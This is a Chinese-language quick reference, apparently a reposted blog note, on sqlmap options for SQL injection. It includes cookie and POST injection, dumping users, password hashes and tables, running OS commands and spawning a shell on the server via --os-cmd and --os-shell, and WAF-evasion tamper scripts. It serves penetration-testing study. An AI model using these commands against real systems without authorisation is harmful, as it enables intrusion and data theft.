sqlmap详解

-hh 获得详细帮助

-v  详细级别 0-6 默认为1

1.显示基本信息和警告信息

2.显示debug信息

3.显示注入的payload   建议使用

4.显示http请求

5.显示http响应

6.显示http响应页面

-d 直接连接数据库

-u 目标url

-r 从文件载入http请求 需要带绝对路径

Cookie 注入 sqlmap.py  -u "www.xxxxxx.com"  --cookie  "id=1"   -level 2 要将等级调为2才进行cookie 的测试

post 注入  sqlmap.py  -u "www.xxxx.com"  --data  "id=1"

               sqlmap.py  -u "www.xxxx.com"  --data  "username=&passwd=" (像一些表单提交型的,直接抓包,查看提交参数,写给data)

               sqlmap.py  -r  "请求数据包的文件 "  -p "id 可测试的参数"

--users 枚举数据库管理系统用户

--password  枚举数据库管理密码

access数据库的注入(--tables 列表名  --columns 列字段  --dunmp 下载数据)

除access数据库的其他数据库( --is-dba  查看当前数据库的权限、 --dbs  查看所有数据库名、--users 所有数据库用户 、 --current-db  当前数据库名、current-user 当前数据库用户)

--os-cmd cmd执行操作系统命令 ( 列: sqlmap.py -u "wwww.xxxxxxx.com" --os-cmd="net user" 相当于执行net user 命令 )

--os-shell  相当于给服务器写交互式shell  退出时一定要quit() 要不退出时,会把shell留在服务器上

--random-agent  随机选定Http的user-Agernt

--proxy  使用代理连接到目标url

绕过WAF的tamper插件的使用:

sqlmap.py  -u "www.xxxx.com"  -tamper  "脚本.py"

宽字节绕过 unmagicquotes.py 

用 /**/分割sql关键字  randomcomments.py

注释绕过  versionedkeywords.py

将注入语句插入带指定位置  (针对静态注入

sqlmap.py -u "www.xxxxxx.com/id/1*.html"  *代表注入的位置

原文地址:https://www.cnblogs.com/pojun/p/6845169.html